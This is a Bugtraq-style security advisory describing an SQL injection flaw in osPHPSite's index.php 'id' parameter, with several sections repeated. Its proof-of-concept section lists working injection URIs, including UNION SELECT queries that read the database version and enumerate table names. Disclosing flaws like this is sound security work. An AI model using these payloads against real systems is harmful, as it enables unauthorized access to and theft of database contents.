osPHPSite 'index.php' SQL Injection Vulnerability
BID:47393
Info
osPHPSite 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 47393 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 17 2011 12:00AM |
| Updated: | Apr 17 2011 12:00AM |
| Credit: | vir0e5 |
| Vulnerable: |
osPHPSite osPHPSite 0 |
| Not Vulnerable: | |
Discussion
osPHPSite 'index.php' SQL Injection Vulnerability
osPHPSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osPHPSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
osPHPSite 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?id=24'
http://www.example.com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8--
http://www.example.com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?id=24'
http://www.example.com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8--
http://www.example.com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
Solution / Fix
osPHPSite 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].